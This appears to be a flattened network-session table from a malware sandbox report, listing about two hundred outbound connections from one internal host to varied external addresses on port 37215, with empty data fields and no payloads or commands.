                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7058192.168.2.1355812157.94.142.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7059192.168.2.1356520197.159.141.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7060192.168.2.1334494197.183.145.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7061192.168.2.1332916157.132.191.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7062192.168.2.135824241.23.31.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7063192.168.2.1342414157.112.219.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7064192.168.2.1336354157.198.184.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7065192.168.2.1347902197.213.79.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7066192.168.2.1357498157.147.73.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7067192.168.2.1343622157.47.178.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7068192.168.2.134356841.207.80.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7069192.168.2.1336624197.62.252.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7070192.168.2.1338816113.222.50.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7071192.168.2.1358416157.82.215.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7072192.168.2.1343162197.135.13.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7073192.168.2.1343588197.246.40.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7074192.168.2.1345580197.107.236.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7075192.168.2.134549441.151.86.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7076192.168.2.1349414157.84.248.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7077192.168.2.135518841.132.200.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7078192.168.2.1360912157.39.245.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7079192.168.2.1343384197.91.243.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7080192.168.2.134191041.35.46.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7081192.168.2.1346942157.180.218.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7082192.168.2.1340054197.200.211.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7083192.168.2.135684041.182.180.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7084192.168.2.1356736197.82.132.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7085192.168.2.1344308157.53.16.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7086192.168.2.135629041.204.34.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7087192.168.2.1355744197.122.250.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7088192.168.2.134908641.151.67.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7089192.168.2.134471041.253.240.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7090192.168.2.1350458157.25.211.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7091192.168.2.136062437.177.97.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7092192.168.2.133972641.107.231.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7093192.168.2.1350934157.18.213.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7094192.168.2.134910441.70.47.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7095192.168.2.134488086.71.55.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7096192.168.2.135378841.3.31.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7097192.168.2.1359244197.86.45.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7098192.168.2.1352114197.10.86.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7099192.168.2.133733641.205.72.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7100192.168.2.135011241.120.115.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7101192.168.2.1345768157.77.240.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7102192.168.2.1339416157.147.140.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7103192.168.2.1360536157.28.61.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7104192.168.2.136003241.202.23.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7105192.168.2.1346926165.103.64.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7106192.168.2.136029839.186.147.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7107192.168.2.1360176163.21.113.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7108192.168.2.1341524157.204.190.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7109192.168.2.135563441.74.78.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7110192.168.2.133607241.54.144.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7111192.168.2.135127841.148.19.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7112192.168.2.134250841.121.12.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7113192.168.2.135275449.209.91.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7114192.168.2.1360880157.51.142.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7115192.168.2.1342330136.231.0.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7116192.168.2.1352948115.159.98.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7117192.168.2.1359830157.67.234.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7118192.168.2.13369108.169.119.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7119192.168.2.1342858150.126.99.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7120192.168.2.134204641.105.102.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7121192.168.2.1333914197.156.92.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7122192.168.2.1351702113.229.137.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7123192.168.2.1349266157.43.58.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7124192.168.2.135017841.245.219.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7125192.168.2.135023841.0.127.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7126192.168.2.1345116177.167.228.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7127192.168.2.1351736197.208.57.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7128192.168.2.135994462.79.186.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7129192.168.2.135365841.208.57.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7130192.168.2.1338242197.86.247.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7131192.168.2.134119441.237.39.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7132192.168.2.1339344197.152.3.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7133192.168.2.1355978133.58.235.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7134192.168.2.135520832.236.232.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7135192.168.2.1343214145.121.5.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7136192.168.2.134903441.72.154.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7137192.168.2.1341838157.159.76.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7138192.168.2.133641841.141.134.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7139192.168.2.1360802197.91.161.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7140192.168.2.1336952197.139.84.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7141192.168.2.1334568197.57.138.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7142192.168.2.135486041.217.245.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7143192.168.2.135862841.118.210.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7144192.168.2.1349734165.73.170.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7145192.168.2.1356866157.223.6.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7146192.168.2.133995441.206.69.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7147192.168.2.1335026157.220.67.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7148192.168.2.135602876.140.196.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7149192.168.2.1354848197.194.128.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7150192.168.2.135886441.31.16.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7151192.168.2.133728441.153.2.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7152192.168.2.1341396157.246.54.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7153192.168.2.134543041.161.240.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7154192.168.2.135375841.212.82.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7155192.168.2.1354380109.43.143.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7156192.168.2.1335042157.219.211.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7157192.168.2.134564441.246.225.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7158192.168.2.1358702197.124.5.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7159192.168.2.1334076197.218.114.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7160192.168.2.133718841.242.94.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7161192.168.2.1333090109.66.3.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7162192.168.2.135254241.237.188.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7163192.168.2.134240859.188.224.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7164192.168.2.134968041.94.153.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7165192.168.2.1343912197.58.92.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7166192.168.2.1355488197.35.154.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7167192.168.2.1335554197.94.211.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7168192.168.2.135200285.128.180.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7169192.168.2.1357228197.31.76.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7170192.168.2.1359948157.58.136.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7171192.168.2.1355602171.205.187.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7172192.168.2.1338982157.104.144.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7173192.168.2.1353816197.100.122.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7174192.168.2.1350732167.15.29.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7175192.168.2.135124657.168.37.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7176192.168.2.1351782197.253.231.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7177192.168.2.134994641.36.224.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7178192.168.2.1350714105.67.10.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7179192.168.2.135659244.153.205.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7180192.168.2.1349350151.215.39.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7181192.168.2.134528867.134.250.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7182192.168.2.134953041.33.135.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7183192.168.2.1358326157.233.178.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7184192.168.2.133730863.160.133.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7185192.168.2.1333586157.70.250.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7186192.168.2.1350188132.19.136.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7187192.168.2.133463841.227.75.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7188192.168.2.135114241.222.184.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7189192.168.2.1356890157.48.222.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7190192.168.2.1339480197.75.187.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7191192.168.2.1337230197.191.96.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7192192.168.2.1348860157.242.130.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7193192.168.2.1333718175.243.144.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7194192.168.2.1333058206.159.14.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7195192.168.2.1356276197.117.86.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7196192.168.2.1345452197.101.138.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7197192.168.2.134367641.197.193.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7198192.168.2.1344222197.59.188.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7199192.168.2.1346840197.94.185.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7200192.168.2.1343386157.235.40.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7201192.168.2.135657095.173.174.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7202192.168.2.1352528157.248.87.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7203192.168.2.134115879.8.178.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7204192.168.2.1356584197.81.219.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7205192.168.2.1338788197.137.81.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7206192.168.2.135962841.18.210.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7207192.168.2.1360564168.50.140.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7208192.168.2.1340830205.156.67.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7209192.168.2.1352190157.250.124.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7210192.168.2.1348000197.88.186.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7211192.168.2.1350080136.80.149.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7212192.168.2.1342366197.72.232.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7213192.168.2.1344978197.127.152.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7214192.168.2.1348356118.213.125.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7215192.168.2.134164041.97.141.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7216192.168.2.134151241.253.95.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7217192.168.2.1351672119.243.204.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7218192.168.2.133568882.171.34.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7219192.168.2.134003439.11.49.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7220192.168.2.133693841.234.49.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7221192.168.2.1346148197.154.16.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7222192.168.2.134599054.195.3.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7223192.168.2.1351584157.214.127.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7224192.168.2.135462043.102.226.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7225192.168.2.135421075.166.204.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7226192.168.2.1356608116.104.120.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7227192.168.2.1345518128.130.189.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7228192.168.2.134434241.91.114.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7229192.168.2.1343832197.38.86.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7230192.168.2.1357742197.229.206.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7231192.168.2.1343584197.175.139.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7232192.168.2.134999285.19.15.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7233192.168.2.1355896157.179.117.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7234192.168.2.1359094157.107.197.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7235192.168.2.1340132197.120.61.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7236192.168.2.1347026157.225.90.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7237192.168.2.1346522197.18.8.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7238192.168.2.135193640.232.106.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7239192.168.2.1348586159.219.36.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7240192.168.2.133348661.59.233.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7241192.168.2.1358860157.137.21.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7242192.168.2.133806241.166.69.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7243192.168.2.133677442.184.55.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7244192.168.2.1343946157.83.171.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7245192.168.2.135208850.164.244.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7246192.168.2.1339270197.72.88.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7247192.168.2.1341374197.161.151.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7248192.168.2.1337956197.242.56.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7249192.168.2.1343712197.126.33.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7250192.168.2.133548241.210.194.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7251192.168.2.1342646157.91.164.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7252192.168.2.1336734157.238.12.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7253192.168.2.1338452197.222.151.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7254192.168.2.133292441.140.68.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7255192.168.2.1336762197.203.207.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7256192.168.2.134187841.187.17.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7257192.168.2.1354860197.130.229.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7258192.168.2.133925041.93.27.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7259192.168.2.1357972157.236.218.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7260192.168.2.1340866197.36.228.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7261192.168.2.1356728197.95.233.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7262192.168.2.1351808197.32.36.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7263192.168.2.1360254157.182.10.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7264192.168.2.1345792123.179.227.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7265192.168.2.1358934157.182.0.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7266192.168.2.134078017.7.235.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
